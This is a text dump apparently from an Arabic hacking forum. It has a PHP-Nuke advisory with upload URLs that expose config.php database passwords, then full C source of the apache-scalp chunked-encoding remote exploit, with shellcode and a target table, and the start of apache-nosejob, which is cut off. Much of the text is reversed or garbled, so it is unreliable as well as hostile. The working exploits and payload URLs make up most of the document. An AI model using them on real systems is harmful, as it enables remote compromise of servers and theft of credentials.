config=elifresu&/images/=txt&wdir.hacked=php&file_name.config=elif&
txt .hacked=php&userfile_name.

the admin 'login' page will be prompted just go to


php .txt and you will see config.hacked/images/net.server.www//:http
that as everyone knows contain the sql's passwords, you can even
and try ...un' to find all the ways to use it i leave you the 'f...upload files
to dont be a SCRIPT KIDDIE we wrote this advisory to help who runs
.php nuke and NOT TO LET YOU HAVE FUN

٢١ ١
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb

:php contains this routine.admin ...let me explain you the bug


‫؛‬
(EMANELIF_TPIRCS$)dirname = ridesab$
‫؛‬٢٠ =extrows t$
‫؛‬٨٥ = sloctxet$
‫؛‬(FLES_PHP$)dirname = ridu$
‫؛‬"/"=ridw$ (ridw$!)if
‫؛‬"FileManager"=po$ (lecnac$)if
} (daolpu$)if
‫؛‬(eman_elifresu$.ridw$.ridesab$،elifresu$)copy
‫؛‬
"ridw$ <-- eman_elifresu$ ".DEDAOLPU_."" = noitcatsal$
WE TOTALY !GMO <------------------------------------- This need a rewrite //
AGREEEEEEEE lmao
‫؛‬("php.header")include//
‫؛‬(elifplh$)GraphicAdmin//
‫؛‬()html_header//
‫؛‬()displaydir//
‫؛‬
"/"=٢ridw$
‫؛‬(٢ridw$ . ridesab$)chdir
‫؛‬()CloseTable//
‫؛‬("php.footer")include//
‫؛‬
("FileManager=p?opph.admin :Location")Header
exit;
{

so you ...that doesnt do a check to see if you are logged as admin or no


...can use it anyway

Solution
cause we wanted to remove the file manager ...we erased the function
-files use FTP to upload- ...anyway but i suggest you to do the same

:conclusions
this software is used by thousands of ...yet another bug of php nuke
i hope that this time the (we run something based on it too) ...people
as i said before just !author will reply soon and will release a patch too
be a script kiddie or we simply WONT post anymore this dont try to
Prolly the funny thing is that who first discovered .kind of advisories
so i ...hours before didnt knew php ٢...the bug was LucisFero that
.fear him and you should too (supergate)

:posted at

٢١ ٢
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb

٤٢١=php?sid.article/net.twlc.www//:net article http.twlc.www//:http


com.bugtraq@securityfocus
-good luck-org .phpnuke.www//:http
Nuke Web -PHP :Project ٧٥١١=di_puorg‫؟‬/tracker/net.sourceforge//:http
Portal System
and of course mailed to the author of php nuke

remember that trojans are ...bugs, ideas, insults, cool girls)tacts con
:(null/dev/directed to

net.lucisfero@twlc
net.supergate@twlc

(yes we are patched)net .twlc.www//:http

.bella a tutti .peace out pimps

eof

-=-=-=-=-=-=Arab VireruZ=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=
=-=-=-=-=-=-=-=-=-=-=-=
:‫اﻟﺨﻄﺄاﻟﺒ ﺮﻣﺠﻲ‬

‫؛‬(EMANELIF_TPIRCS$)dirname = ridesab$
‫؛‬٢٠ = swortxet$
‫؛‬٨٥ = sloctxet$
‫؛‬(FLES_PHP$)dirname = ridu$
‫؛‬"/"=ridw$ (ridw$!)if
‫؛‬"FileManager"=po$ (lecnac$)if
} (daolpu$)if
‫؛‬(eman_elifresu$.ridw$.ridesab$،elifresu$)copy
‫؛‬"ridw$ <-- eman_elifresu$ ".DEDAOLPU_."" = noitcatsal$
WE TOTALY !GMO <-------------------------------------This need a rewrite //
AGREEEEEEEE lmao
‫؛‬("php.header")include//
‫؛‬(elifplh$)GraphicAdmin//
‫؛‬()html_header//
‫؛‬()displaydir//
‫؛‬
"/"=٢ridw$
‫؛‬(٢ridw$ . ridesab$)chdir
‫؛‬()eCloseTabl//
‫؛‬("php.footer")include//

٢١ ٣
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb

‫؛‬
("FileManager=php?op.admin :Location")Header
exit;
{
-=-=-=-=-=-=Arab VireruZ=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=
=-=-=-=-=-=-=-=-=-=-=-=
:‫اﻟﺜﻐ ﺮة‬

١=php?upload.admin/net.server.www//:http
config=elifresu&/images/=txt&wdir.hacked=php&file_name.config=elif&
txt.hacked=erfile_namephp&us.

-=-=-=-=-=-=Arab VireruZ=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=
=-=-=-=-=-=-=-=-=-=-=-=
‫ﺘﻌﺪﯾ ﻞ‬
‫اﻟﺜﻐ ﺮةﺑﻌﺪاﻟ‬

١=php?upload.admin/net.server.www//:http
php.config=elifresu&/=txt&wdir.ultramode=php&file_name.config=elif&
txt.ultramode=eman_elifresu&

-=-=-=-=-=-=Arab VireruZ=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=
=-=-=-=-=-=-=-=-=-=-=-=
:‫ﻋﻤ ﻞاﻟﺜﻐ ﺮة‬

‫ﺘﺎجﺗ ﺤﻤﯿ ﻞ‬
‫ﻟﻦﺗ ﺤ‬txt.ultramode‫اﻟﻰاﻟﻤﻠ ﻒاﻟﻨﺼﻲاﻟﻤﻮﺟﻮد‬php.config ‫= ﻃﺒﻊ ﻣﻠ ﻒاﻟﻜﻮﻧﻔﯿ ﺞ‬-
‫ﻣﻠ ﻒ ﻧﺼﻲﻟﻄﺒﻊاﻟﻤﻠ ﻒ‬
‫ﻗﻊاﻵن‬ ‫ﺘ ﺤﻤﯿ ﻞاﻟﻰاﻟﻤﻮ‬
‫ﻗﻊﺗﻤﻨﻊاﻟ‬
‫( وﻷنﺑﻌ ﺾاﻟﻤﻮا‬-: ‫ﺘ ﺞ‬
‫ﺘﻨ‬
‫ﻛﻤﺎ ﻫﻮ ﻣﻮﺟﻮدﺑﺎﻟﺸ ﺮ حاﻷﻧﻘﻠﯿﺰي ﯾﻌﻨﻲﻓﻜ ﺮ واﺳ‬
txt.ultramode/com.server//:http ‫ﻣﺎ ﻋﻠﯿﻚ ﺳﻮىاﻟﺪ ﺧﻮ لاﻟﻰ‬
-=‫ﻗﻊ‬‫ﺘﺎﺑﻊﻟﻘﺎﻋﺪةﺑﯿﺎﻧﺎ تاﻟﻤﻮ‬
‫ﺘﺠﺪﺑﺎس واﻟﯿﻮزراﻟ‬‫وﺳ‬

‫ﻣﻼ ﺣﻈﺎ ت‬
‫ﻗﻪ‬
‫ﺘ ﺮا‬
‫ﻗﻊاﻟ ﺮادا ﺧ‬
‫ﺑﺎﻟﻤﻮ‬com.server ‫ﺑﺪ ل‬-١

nuke/com.server//:ttph : ‫ﻗﻊاﻟﻤﺠﻠﺔ ﻣﺜﺎ ل‬


‫ﺗﺄﻛﺪ ﻣﻦ ﻣﻮ‬-٢

...‫ﻛﻤﺎ ﯾﻈﻦاﻟﺒﻌ ﺾ‬٥٫٢‫ﻫﺬهاﻟﺜﻐ ﺮة ﻻﺗﻌﻤ ﻞ ﻣﻊا ﺻﺪار‬-٣

٢١ ٤
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫" ﺛﻐﺮة ‪" Chunked‬‬

‫‪$$$$$$$$$$$$$$$$$$$$$‬‬
‫ﻗﻊ ‪angels-bytes‬‬
‫ﻣﻨﻘﻮ ل ﻣﻦ ﻣﻮ‬
‫‪$$$$$$$$$$$$$$$$$$$$$‬‬

‫ﻗﻊ ‪ angels-bytes‬ﻋﻨﻬﺎ ﻫﻮ‬ ‫ـ ‪ Apache ،‬ﺎﻟﺴﺒﺐﻟﻌﺪمﺗ ﺤﺪ ث ﻣﻮ‬‫ﻛﻠﻨﺎ ﺳﻤﻊﺑﺜﻐ ﺮهﺗﺴﻤﻰ ‪Chunked‬ﻟ‬


‫ﻗﻊ ‪،‬اﻵن ﺳﺄ ﺿﻊ ‪ Retina Apache Chunked Scanner ،‬ﻮﻫﻲأداة‬ ‫أﻧﻬﺎﺄﺗ ﺖﻗﺒ ﻞإﻧﻄﻼ قاﻟﻤﻮ‬
‫ﺗﻘﻮمﺑﻔ ﺤ ﺺ ﻧﻄﺎ ق ﻣﻦ ‪ ٢٥٤‬ﻋﻨﻮان آيﺑﻲ ‪ ،‬وﺗﻈﻬ ﺮﻟﻚ ﻣﺎ ﻣﻨﻬﺎ ﻣﺼﺎبﺑﻬﺬهاﻟﺜﻐ ﺮه‪.‬‬

‫ﺘﻨﺰﯾ ﻞأﺑﺎﺗﺸﻲ ‪٢٫٠٫٣٩‬ﻓﻬﻮاﻷﻓ ﻀ ﻞاﻟﻰ ﺎﻵن‬


‫ﺈذاﺄرد ت ﻣﻌﺎﻟﺠﺔ ﻫﺬهاﻟﺜﻐ ﺮه ﻋﻨﺪ وﺟﻮدﻫﺎﻓﺄﻧﺼ ﺤﻚﺑ‬
‫ﺘﻨﺰﯾ ﻞ‬
‫ﻫﺬه ﻫﻲ و ﺻﻠﺔاﻟ‬
‫‪http://www .apache.org/dist/httpd/binaries‬‬

‫ﺘﺜﻤﺎرﯾﻦ‬
‫ﺘﺜﻤﺎر ﻫﺬهاﻟﺜﻐ ﺮهﻓﺴﻮ فأ ﺿﻊﻟﻜﻢأﻓ ﻀ ﻞأﺳ‬
‫ﺄﻣﺎﻟﻤﺴﺄﻟﺔﺈﺳ‬

‫ﺎﻟﺨﻄﺄﻓﻲأﺑﺎﺗﺸﻲ ‪ 1.3.24‬ﻮاﻋﻠﻰإﻟﻰ‪ ٢‬و ﻣﻦ‪٢‬إﻟﻰ ‪-dev ، ٢٫٠٫٣٦‬ﻮﻫﻲﻓﻲاﻟ ﺮوﺗﯿﻦاﻟﺒ ﺮﻣﺠﻲاﻟﺬي‬


‫ﺘﻌﺎﻣ ﻞ ﻣﻊ ﺮﺳﺎﺋ ﻞاﻟﺨﻄﺄ‬
‫ﯾ‬

‫ﺘﺴﺒﺐ ﻃﻔﺢ ﻣ ﺤﻠﻲﻓﻲاﻟﺴﯿ ﺮﻓ ﺮاﻟﻤﺼﺎب ‪ ،‬ﻣﺆدﯾﻪﺑﺬﻟﻚإﻟﻰ‬‫ﺘﺨﺪﻣﺎن ﻣﻦﻗﺒ ﻞ ﻣﻬﺎﺟﻢﺑﻌﯿﺪﻟ‬‫ﺘﺜﻤﺎرانﺗﺴ‬ ‫ﻫﺬاناﻹﺳ‬


‫ﺘﻨﻔﯿﺬﻛﻮد‬
‫ﺘﺎﺑﻪﻓﻲاﻟﺬاﻛ ﺮة ‪ ،‬وﺑﻄ ﺮﯾﻘﺔ ﻣﺎﺗﺴﻤﺢﻟ‬
‫إﻋﺎدةﻛ‬

‫ﺘﺒﺎرﻫﺎ ﻣﻦﻗﺒ ﻞ ‪angels-bytes.com‬ﻗﺒ ﻞ و ﺿﻌﻬﺎﻟﻜﻢﻫﻨﺎ ((‬


‫ﻗﺪﺗﻢﺗﺠ ﺮﯾﺒﻬﺎ وإ ﺧ‬‫((*‪/‬‬
‫‪*/‬‬
‫*‪ /‬ﺣﺼﻠﻨﺎ ﻋﻠﯿﻬﺎ ﻣﻦ ﺳﯿﻜﻮرﺗﻲﺗﯿﻢ*‪/‬‬
‫‪#include‬‬
‫‪#include‬‬
‫‪#include‬‬
‫‪#include‬‬
‫‪#include‬‬
‫‪#include‬‬
‫‪#include‬‬
‫‪#include‬‬
‫‪#include‬‬
‫‪#include‬‬
‫‪#include‬‬

‫‪#define EXPLOIT_TIMEOUT 5 /* num seconds to wait before assuming‬‬


‫‪it failed */‬‬

‫‪٢١ ٥‬‬
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb

#define RET_ADDR_INC 512

#define MEMCPY_s1_OWADDR_DELTA -146


#define PADSIZE_1 4
#define PADSIZE_2 5
#define PADSIZE_3 7

#define REP_POPULATOR 24
#define REP_RET_ADDR 6
#define REP_ZERO 36
#define REP_SHELLCODE 24
#define NOPCOUNT 1024

#define NOP 0x41


#define PADDING_1 \\'A\\'
#define PADDING_2 \\'B\\'
#define PADDING_3 \\'C\\'

#define PUT_STRING(s) memcpy(p, s, strlen(s)); p += strlen(s);


#define PUT_BYTES(n, b) memset(p, b, n); p += n;

#define SHELLCODE_LOCALPORT_OFF 30

char shellcode[] =
\\\" \\\\x89\\\\xe2\\\\x83\\\\xec\\\\x10\\\\x6a\\\\x10\
\\\x54\\\\x52\\\\x6a\\\\x00\\\\x6a\\\\x00\\\\xb8\\
\\x1f\\\"
\\\" \\\\x00\\\\x00\\\\x00\\\\xcd\\\\x80\\\\x80\\\\x7a\
\\\x01\\\\x02\\\\x75\\\\x0b\\\\x66\\\\x81\\\\x7a\\
\\x02\\\"
\\\" \\\\x42\\\\x41\\\\x75\\\\x03\\\\xeb\\\\x0f\\\\x90\
\\\xff\\\\x44\\\\x24\\\\x04\\\\x81\\\\x7c\\\\x24\\
\\x04\\\"
\\\" \\\\x00\\\\x01\\\\x00\\\\x00\\\\x75\\\\xda\\\\xc7\
\\\x44\\\\x24\\\\x08\\\\x00\\\\x00\\\\x00\\\\x00\\
\\xb8\\\"
\\\" \\\\x5a\\\\x00\\\\x00\\\\x00\\\\xcd\\\\x80\\\\xff\
\\\x44\\\\x24\\\\x08\\\\x83\\\\x7c\\\\x24\\\\x08\\
\\x03\\\"
\\\" \\\\x75\\\\xee\\\\x68\\\\x0b\\\\x6f\\\\x6b\\\\x0b\

٢١ ٦
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb

\\\x81\\\\x34\\\\x24\\\\x01\\\\x00\\\\x00\\\\x01\\
\\x89\\\"
\\\" \\\\xe2\\\\x6a\\\\x04\\\\x52\\\\x6a\\\\x01\\\\x6a\
\\\x00\\\\xb8\\\\x04\\\\x00\\\\x00\\\\x00\\\\xcd\\
\\x80\\\"
\\\" \\\\x68\\\\x2f\\\\x73\\\\x68\\\\x00\\\\x68\\\\x2f\
\\\x62\\\\x69\\\\x6e\\\\x89\\\\xe2\\\\x31\\\\xc0\\
\\x50\\\"
\\\" \\\\x52\\\\x89\\\\xe1\\\\x50\\\\x51\\\\x52\\\\x50\
\\\xb8\\\\x3b\\\\x00\\\\x00\\\\x00\\\\xcd\\\\x80\\
\\xcc\\\";

struct {
char *type;
u_long retaddr;
} targets[] = { // hehe, yes theo, that say OpenBSD here!
{ \\\"OpenBSD 3.0 x86 / Apache 1.3.20\\\", 0xcf92f },
{ \\\"OpenBSD 3.0 x86 / Apache 1.3.22\\\", 0x8f0aa },
{ \\\"OpenBSD 3.0 x86 / Apache 1.3.24\\\", 0x90600 },
{ \\\"OpenBSD 3.1 x86 / Apache 1.3.20\\\", 0x8f2a6 },
{ \\\"OpenBSD 3.1 x86 / Apache 1.3.23\\\", 0x90600 },
{ \\\"OpenBSD 3.1 x86 / Apache 1.3.24\\\", 0x9011a },
{ \\\"OpenBSD 3.1 x86 / Apache 1.3.24 #2\\\", 0x932ae },
};

int main(int argc, char *argv[]) {

char *hostp, *portp;


unsigned char buf[512], *expbuf, *p;
int i, j, lport;
int sock;
int bruteforce, owned, progress;
u_long retaddr;
struct sockaddr_in sin, from;

if(argc != 3) {
printf(\\\"Usage: %s \\\\n\\\", argv[0]);
printf(\\\" Using targets:\\\\t./apache-scalp 3 127.0.0.1:8080\\\\n\\\");
printf(\\\" Using bruteforce:\\\\t./apache-scalp 0x8f000

٢١ ٧
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb

127.0.0.1:8080\\\\n\\\");
printf(\\\"\\\\n--- --- - Potential targets list - --- ----\\\\n\\\");
printf(\\\"Target ID / Target specification\\\\n\\\");
for(i = 0; i < sizeof(targets)/8; i++)
printf(\\\"\\\\t%d / %s\\\\n\\\", i, targets[i].type);

return -1;
}

hostp = strtok(argv[2], \\\":\\\");


if((portp = strtok(NULL, \\\":\\\")) == NULL)
portp = \\\"80\\\";

retaddr = strtoul(argv[1], NULL, 16);


if(retaddr < sizeof(targets)/8) {
retaddr = targets[retaddr].retaddr;
bruteforce = 0;
}
else
bruteforce = 1;

srand(getpid());
signal(SIGPIPE, SIG_IGN);
for(owned = 0, progress = 0;;retaddr += RET_ADDR_INC) {

/* skip invalid return adresses */


i = retaddr & 0xff;
if(i == 0x0a || i == 0x0d)
retaddr++;
else if(memchr(&retaddr, 0x0a, 4) || memchr(&retaddr, 0x0d, 4))
continue;

sock = socket(AF_INET, SOCK_STREAM, 0);


sin.sin_family = AF_INET;
sin.sin_addr.s_addr = inet_addr(hostp);
sin.sin_port = htons(atoi(portp));
if(!progress)
printf(\\\"\\\\n[*] Connecting.. \\\");

٢١ ٨
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb

fflush(stdout);
if(connect(sock, (struct sockaddr *) & sin, sizeof(sin)) != 0) {
perror(\\\"connect()\\\");
exit(1);
}

if(!progress)
printf(\\\"connected!\\\\n\\\");

/* Setup the local port in our shellcode */


i = sizeof(from);
if(getsockname(sock, (struct sockaddr *) & from, &i) != 0) {
perror(\\\"getsockname()\\\");
exit(1);
}

lport = ntohs(from.sin_port);
shellcode[SHELLCODE_LOCALPORT_OFF + 1] = lport & 0xff;
shellcode[SHELLCODE_LOCALPORT_OFF + 0] = (lport >> 8) & 0xff;

p = expbuf = malloc(8192 + ((PADSIZE_3 + NOPCOUNT + 1024) *


REP_SHELLCODE)
+ ((PADSIZE_1 + (REP_RET_ADDR * 4) + REP_ZERO + 1024) *
REP_POPULATOR));

PUT_STRING(\\\"GET / HTTP/1.1\\\\r\\\\nHost: apache-scalp.c\\\\r\\\\n\\\");

for (i = 0; i < REP_SHELLCODE; i++) {


PUT_STRING(\\\"X-\\\");
PUT_BYTES(PADSIZE_3, PADDING_3);
PUT_STRING(\\\": \\\");
PUT_BYTES(NOPCOUNT, NOP);
memcpy(p, shellcode, sizeof(shellcode) - 1);
p += sizeof(shellcode) - 1;
PUT_STRING(\\\"\\\\r\\\\n\\\");
}

for (i = 0; i < REP_POPULATOR; i++) {


PUT_STRING(\\\"X-\\\");
PUT_BYTES(PADSIZE_1, PADDING_1);

٢١ ٩
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb

PUT_STRING(\\\": \\\");
for (j = 0; j < REP_RET_ADDR; j++) {
*p++ = retaddr & 0xff;
*p++ = (retaddr >> 8) & 0xff;
*p++ = (retaddr >> 16) & 0xff;
*p++ = (retaddr >> 24) & 0xff;
}

PUT_BYTES(REP_ZERO, 0);
PUT_STRING(\\\"\\\\r\\\\n\\\");
}

PUT_STRING(\\\"Transfer-Encoding: chunked\\\\r\\\\n\\\");
snprintf(buf, sizeof(buf) - 1, \\\"\\\\r\\\\n%x\\\\r\\\\n\\\", PADSIZE_2);
PUT_STRING(buf);
PUT_BYTES(PADSIZE_2, PADDING_2);
snprintf(buf, sizeof(buf) - 1, \\\"\\\\r\\\\n%x\\\\r\\\\n\\\",
MEMCPY_s1_OWADDR_DELTA);
PUT_STRING(buf);

write(sock, expbuf, p - expbuf);

progress++;
if((progress%70) == 0)
progress = 1;

if(progress == 1) {
memset(buf, 0, sizeof(buf));
sprintf(buf, \\\"\\\\r[*] Currently using retaddr 0x%lx, length %u, localport
%u\\\",
retaddr, (unsigned int)(p - expbuf), lport);
memset(buf + strlen(buf), \\' \\', 74 - strlen(buf));
puts(buf);
if(bruteforce)
putchar(\\';\\');
}
else
putchar((rand()%2)? \\'P\\': \\'p\\');

fflush(stdout);
while (1) {

٢٢٠
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb

fd_set fds;
int n;
struct timeval tv;

tv.tv_sec = EXPLOIT_TIMEOUT;
tv.tv_usec = 0;

FD_ZERO(&fds);
FD_SET(0, &fds);
FD_SET(sock, &fds);

memset(buf, 0, sizeof(buf));
if(select(sock + 1, &fds, NULL, NULL, &tv) > 0) {
if(FD_ISSET(sock, &fds)) {
if((n = read(sock, buf, sizeof(buf) - 1)) <= 0)
break;

if(!owned && n >= 4 && memcmp(buf, \\\"\\\\nok\\\\n\\\", 4) == 0) {


printf(\\\"\\\\nGOBBLE GOBBLE!@#%%)*#\\\\n\\\");
printf(\\\"retaddr 0x%lx did the trick!\\\\n\\\", retaddr);
sprintf(expbuf, \\\"uname -a;id;echo hehe, now use 0day OpenBSD
local kernel exploit to gain instant r00t\\\\n\\\");
write(sock, expbuf, strlen(expbuf));
owned++;
}

write(1, buf, n);


}

if(FD_ISSET(0, &fds)) {
if((n = read(0, buf, sizeof(buf) - 1)) < 0)
exit(1);

write(sock, buf, n);


}
}

if(!owned)
break;
}

free(expbuf);

٢٢١
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb

close(sock);

if(owned)
return 0;

if(!bruteforce) {
fprintf(stderr, \\\"Ooops.. hehehe!\\\\n\\\");
return -1;
}
}

return 0;
}

Exploit #2:
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#ifdef __linux__
#include
#endif

#define HOST_PARAM \\\"apache-nosejob.c\\\" /* The Host: field */


#define DEFAULT_CMDZ \\\"uname -a;id;echo \\'hehe, now use another
bug/backdoor/feature (hi Theo!) to gain instant r00t\\';\\\\n\\\"
#define RET_ADDR_INC 512

#define PADSIZE_1 4
#define PADSIZE_2 5
#define PADSIZE_3 7

٢٢٢
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb

#define REP_POPULATOR 24
#define REP_SHELLCODE 24
#define NOPCOUNT 1024

#define NOP 0x41


#define PADDING_1 \\'A\\'
#define PADDING_2 \\'B\\'
#define PADDING_3 \\'C\\'

#define PUT_STRING(s) memcpy(p, s, strlen(s)); p += strlen(s);


#define PUT_BYTES(n, b) memset(p, b, n); p += n;

char shellcode[] =
\\\" \\\\x68\\\\x47\\\\x47\\\\x47\\\\x47\\\\x89\\\\xe3\
\\\x31\\\\xc0\\\\x50\\\\x50\\\\x50\\\\x50\\\\xc6\\
\\x04\\\\x24\\\"
\\\" \\\\x04\\\\x53\\\\x50\\\\x50\\\\x31\\\\xd2\\\\x31\
\\\xc9\\\\xb1\\\\x80\\\\xc1\\\\xe1\\\\x18\\\\xd1\\
\\xea\\\\x31\\\"
\\\" \\\\xc0\\\\xb0\\\\x85\\\\xcd\\\\x80\\\\x72\\\\x02\
\\\x09\\\\xca\\\\xff\\\\x44\\\\x24\\\\x04\\\\x80\\
\\x7c\\\\x24\\\"
\\\" \\\\x04\\\\x20\\\\x75\\\\xe9\\\\x31\\\\xc0\\\\x89\
\\\x44\\\\x24\\\\x04\\\\xc6\\\\x44\\\\x24\\\\x04\\
\\x20\\\\x89\\\"
\\\" \\\\x64\\\\x24\\\\x08\\\\x89\\\\x44\\\\x24\\\\x0c\
\\\x89\\\\x44\\\\x24\\\\x10\\\\x89\\\\x44\\\\x24\\
\\x14\\\\x89\\\"
\\\" \\\\x54\\\\x24\\\\x18\\\\x8b\\\\x54\\\\x24\\\\x18\
\\\x89\\\\x14\\\\x24\\\\x31\\\\xc0\\\\xb0\\\\x5d\\
\\xcd\\\\x80\\\"
\\\" \\\\x31\\\\xc9\\\\xd1\\\\x2c\\\\x24\\\\x73\\\\x27\
\\\x31\\\\xc0\\\\x50\\\\x50\\\\x50\\\\x50\\\\xff\\
\\x04\\\\x24\\\"
\\\" \\\\x54\\\\xff\\\\x04\\\\x24\\\\xff\\\\x04\\\\x24\
\\\xff\\\\x04\\\\x24\\\\xff\\\\x04\\\\x24\\\\x51\\
\\x50\\\\xb0\\\"
\\\" \\\\x1d\\\\xcd\\\\x80\\\\x58\\\\x58\\\\x58\\\\x58\
\\\x58\\\\x3c\\\\x4f\\\\x74\\\\x0b\\\\x58\\\\x58\\
\\x41\\\\x80\\\"
\\\" \\\\xf9\\\\x20\\\\x75\\\\xce\\\\xeb\\\\xbd\\\\x90\
\\\x31\\\\xc0\\\\x50\\\\x51\\\\x50\\\\x31\\\\xc0\\

٢٢٣
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb

\\xb0\\\\x5a\\\"
\\\" \\\\xcd\\\\x80\\\\xff\\\\x44\\\\x24\\\\x08\\\\x80\
\\\x7c\\\\x24\\\\x08\\\\x03\\\\x75\\\\xef\\\\x31\\
\\xc0\\\\x50\\\"
\\\" \\\\xc6\\\\x04\\\\x24\\\\x0b\\\\x80\\\\x34\\\\x24\
\\\x01\\\\x68\\\\x42\\\\x4c\\\\x45\\\\x2a\\\\x68\\
\\x2a\\\\x47\\\"
\\\" \\\\x4f\\\\x42\\\\x89\\\\xe3\\\\xb0\\\\x09\\\\x50\
\\\x53\\\\xb0\\\\x01\\\\x50\\\\x50\\\\xb0\\\\x04\\
\\xcd\\\\x80\\\"
\\\" \\\\x31\\\\xc0\\\\x50\\\\x68\\\\x6e\\\\x2f\\\\x73\
\\\x68\\\\x68\\\\x2f\\\\x2f\\\\x62\\\\x69\\\\x89\\
\\xe3\\\\x50\\\"
\\\" \\\\x53\\\\x89\\\\xe1\\\\x50\\\\x51\\\\x53\\\\x50\
\\\xb0\\\\x3b\\\\xcd\\\\x80\\\\xcc\\\";
;

struct {
char *type; /* description for newbie penetrator */
int delta; /* delta thingie! */
u_long retaddr; /* return address */
int repretaddr; /* we repeat retaddr thiz many times in the buffer */
int repzero; /* and \\\\0\\'z this many times */
} targets[] = { // hehe, yes theo, that say OpenBSD here!
{ \\\"FreeBSD 4.5 x86 / Apache/1.3.23 (Unix)\\\", -150, 0x80f3a00, 6, 36 },
{ \\\"FreeBSD 4.5 x86 / Apache/1.3.23 (Unix)\\\", -150, 0x80a7975, 6, 36 },
{ \\\"OpenBSD 3.0 x86 / Apache 1.3.20\\\", -146, 0xcfa00, 6, 36 },
{ \\\"OpenBSD 3.0 x86 / Apache 1.3.22\\\", -146, 0x8f0aa, 6, 36 },
{ \\\"OpenBSD 3.0 x86 / Apache 1.3.24\\\", -146, 0x90600, 6, 36 },
{ \\\"OpenBSD 3.0 x86 / Apache 1.3.24 #2\\\", -146, 0x98a00, 6, 36 },
{ \\\"OpenBSD 3.1 x86 / Apache 1.3.20\\\", -146, 0x8f2a6, 6, 36 },
{ \\\"OpenBSD 3.1 x86 / Apache 1.3.23\\\", -146, 0x90600, 6, 36 },
{ \\\"OpenBSD 3.1 x86 / Apache 1.3.24\\\", -146, 0x9011a, 6, 36 },
{ \\\"OpenBSD 3.1 x86 / Apache 1.3.24 #2\\\", -146, 0x932ae, 6, 36 },
{ \\\"OpenBSD 3.1 x86 / Apache 1.3.24 PHP 4.2.1\\\", -146, 0x1d7a00, 6,
36 },
{ \\\"NetBSD 1.5.2 x86 / Apache 1.3.12 (Unix)\\\", -90, 0x80eda00, 5, 42 },
{ \\\"NetBSD 1.5.2 x86 / Apache 1.3.20 (Unix)\\\", -90, 0x80efa00, 5, 42 },
{ \\\"NetBSD 1.5.2 x86 / Apache 1.3.22 (Unix)\\\", -90, 0x80efa00, 5, 42 },
{ \\\"NetBSD 1.5.2 x86 / Apache 1.3.23 (Unix)\\\", -90, 0x80efa00, 5, 42 },
{ \\\"NetBSD 1.5.2 x86 / Apache 1.3.24 (Unix)\\\", -90, 0x80efa00, 5, 42 },
}, victim;

٢٢٤
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb

void usage(void) {
int i;

printf(\\\"GOBBLES Security Labs\\\\t\\\\t\\\\t\\\\t\\\\t- apache-


nosejob.c\\\\n\\\\n\\\");
printf(\\\"Usage: ./apache-nosejob <-switches> -h host[:80]\\\\n\\\");
printf(\\\" -h host[:port]\\\\tHost to penetrate\\\\n\\\");
printf(\\\" -t #\\\\t\\\\t\\\\tTarget id.\\\\n\\\");
printf(\\\" Bruteforcing options (all required, unless -o is used!):\\\\n\\\");
printf(\\\" -o char\\\\t\\\\tDefault values for the following OSes\\\\n\\\");
printf(\\\" \\\\t\\\\t\\\\t(f)reebsd, (o)penbsd, (n)etbsd\\\\n\\\");
printf(\\\" -b 0x12345678\\\\t\\\\tBase address used for bruteforce\\\\n\\\");
printf(\\\" \\\\t\\\\t\\\\tTry 0x80000/obsd, 0x80a0000/fbsd,
0x080e0000/nbsd.\\\\n\\\");
printf(\\\" -d -nnn\\\\t\\\\tmemcpy() delta between s1 and addr to
overwrite\\\\n\\\");
printf(\\\" \\\\t\\\\t\\\\tTry -146/obsd, -150/fbsd, -90/nbsd.\\\\n\\\");
printf(\\\" -z #\\\\t\\\\t\\\\tNumbers of time to repeat \\\\\\\\0 in the
buffer\\\\n\\\");
printf(\\\" \\\\t\\\\t\\\\tTry 36 for openbsd/freebsd and 42 for netbsd\\\\n\\\");
printf(\\\" -r #\\\\t\\\\t\\\\tNumber of times to repeat retadd in the
buffer\\\\n\\\");
printf(\\\" \\\\t\\\\t\\\\tTry 6 for openbsd/freebsd and 5 for netbsd\\\\n\\\");
printf(\\\" Optional stuff:\\\\n\\\");
printf(\\\" -w #\\\\t\\\\t\\\\tMaximum number of seconds to wait for
shellcode reply\\\\n\\\");
printf(\\\" -c cmdz\\\\t\\\\tCommands to execute when our shellcode
replies\\\\n\\\");
printf(\\\" \\\\t\\\\t\\\\taka auto0wncmdz\\\\n\\\");
printf(\\\"\\\\nExamples will be published in upcoming apache-scalp-
HOWTO.pdf\\\\n\\\");
printf(\\\"\\\\n--- --- - Potential targets list - --- ---- ------- ------------\\\\n\\\");
printf(\\\" ID / Return addr / Target specification\\\\n\\\");
for(i = 0; i < sizeof(targets)/sizeof(victim); i++)
printf(\\\"% 3d / 0x%.8lx / %s\\\\n\\\", i, targets[i].retaddr, targets[i].type);

exit(1);
}

٢٢٥
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb

int main(int argc, char *argv[]) {


char *hostp, *portp, *cmdz = DEFAULT_CMDZ;
u_char buf[512], *expbuf, *p;
int i, j, lport, sock;
